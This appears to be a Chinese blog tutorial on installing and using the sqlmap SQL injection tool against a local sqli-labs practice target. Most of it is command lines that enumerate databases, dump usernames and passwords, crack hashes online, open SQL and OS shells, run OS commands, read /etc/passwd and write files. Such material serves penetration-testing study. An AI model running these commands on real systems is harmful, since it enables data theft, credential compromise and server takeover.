赞
踩
本文只用作学习研究,请勿非法使用!!!
本文只用作学习研究,请勿非法使用!!!
本文只用作学习研究,请勿非法使用!!!
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB
sqlmap支持的类型:
SQLmap的强大功能包括数据库指纹指纹识别、数据库枚举、数据提取、访问目标文件系统,并在获取完全的操作权限时实行任意命令。
当常规的注入工具不能利用SQL注入漏洞进行注入时,使用sqlmap会有意想不到的结果
本次所讲为Windows安装,如果不想安装直接下载kali,kali自带sqlmap
之后进行安装:
双击安装程序
安装过程会弹出窗口,点是即可
之后使用win+R打开CMD窗口进行验证:
输入python --version进行验证
python已安装成功
起始位置改为sqlmap安装目录:
之后双击快捷方式,输入python sqlmap.py --version
出现以上提示,说明sqlmap安装成功
python sqlmap.py -u http://192.168.137.11/sqli-labs/Less-1/?id=1
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1
sqlmap -u "http://192.168.137.11/sqli-labs/Less-1/?id=1&uid=2"
从文件中加载HTTP请求,sqlmap可以从一个文本文件中获取HTTP请求,这样就可以不设置其他参数(如cookie、POST数据等),txt文件中的内容为WEB数据包
框中的内容就是WEB数据包
把框中的内容复制出来,并创建一个1.txt文件:
sqlmap -r 1.txt
-->-r参数可判断文本中的请求是否存在注入,可以在行数最后面加个*号,代表此位置注入
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --dbs
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 -D security --tables
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --tables
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 -D security -T users --columns
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 -D security -T users -C username,password --dump
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --users
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --password
由于比较慢,这里知道方法就可以了
可以看到上图中密码是加密的,可以在www.cmd5.com中自行解密
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --current-db
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --current-user
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --is-dba
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --roles
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --referer www.baidu.com
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --sql-shell
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --os-cmd pwd
不知道为什么一直报超时,试过很多办法都不可以,延时、时间盲注、Windows系统都尝试过,都报404
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --os-shell
-->跟上述情况一样,超时,原因未知sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --file-read "/etc/passwd"
修改secure_file_priv=“” 为空:
首先登录:http://192.168.137.11:8080/login
新增配置:"secure_file_pric= "
sqlmap -u http://192.168.137.11/sqli-labs/Less-1/?id=1 --file-write "/root/1.txt" --file-dest "/tmp/2.txt"
sqlmap -u 'URL' --tamper "模块名"
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。